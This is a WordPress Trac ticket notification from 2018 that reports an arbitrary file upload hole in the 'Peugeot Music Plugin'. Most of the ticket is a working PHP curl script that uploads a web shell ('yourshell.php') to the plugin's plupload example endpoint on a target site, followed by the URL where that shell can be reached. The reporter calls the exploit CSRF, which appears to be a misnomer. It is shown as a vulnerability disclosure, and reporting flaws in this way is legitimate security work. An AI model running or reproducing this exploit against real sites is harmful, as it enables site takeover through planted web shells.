[wp-trac] [WordPress Trac] #44374: wordpress Plugins (Peugeot Music Plugin) Arbitrary File Upload
WordPress Trac
noreply at wordpress.org
Fri Jun 15 10:58:30 UTC 2018
#44374: wordpress Plugins (Peugeot Music Plugin) Arbitrary File Upload
--------------------------+-----------------------------
Reporter: xvirus007 | Owner: (none)
Type: defect (bug) | Status: assigned
Priority: normal | Milestone: Awaiting Review
Component: Upload | Version: 2.0
Severity: critical | Keywords: needs-patch
Focuses: privacy |
--------------------------+-----------------------------
== Exploit: /wp-content/plugins/peugeot-music-
plugin/js/plupload/examples/upload.php
{{{
• Vuln? {"jsonrpc" : "2.0", "result" : null, "id" : "id"}
}}}
For CSRF using php xampp.
Exploit Code (CRSF):
{{{#!php
• CSRF
<?php
$url = "http://target.com/wp-content/plugins/peugeot-music-
plugin/js/plupload/examples/upload.php"; // put URL Here
$post = array
(
"file" => "@yourshell.jpg",
"name" => "yourshell.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1;
rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
}}}
• Shell Locate:
target.com/wp-content/plugins/peugeot-music-
plugin/js/plupload/examples/uploads/yourshell.php
--
Ticket URL: <https://core.trac.wordpress.org/ticket/44374>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform
More information about the wp-trac
mailing list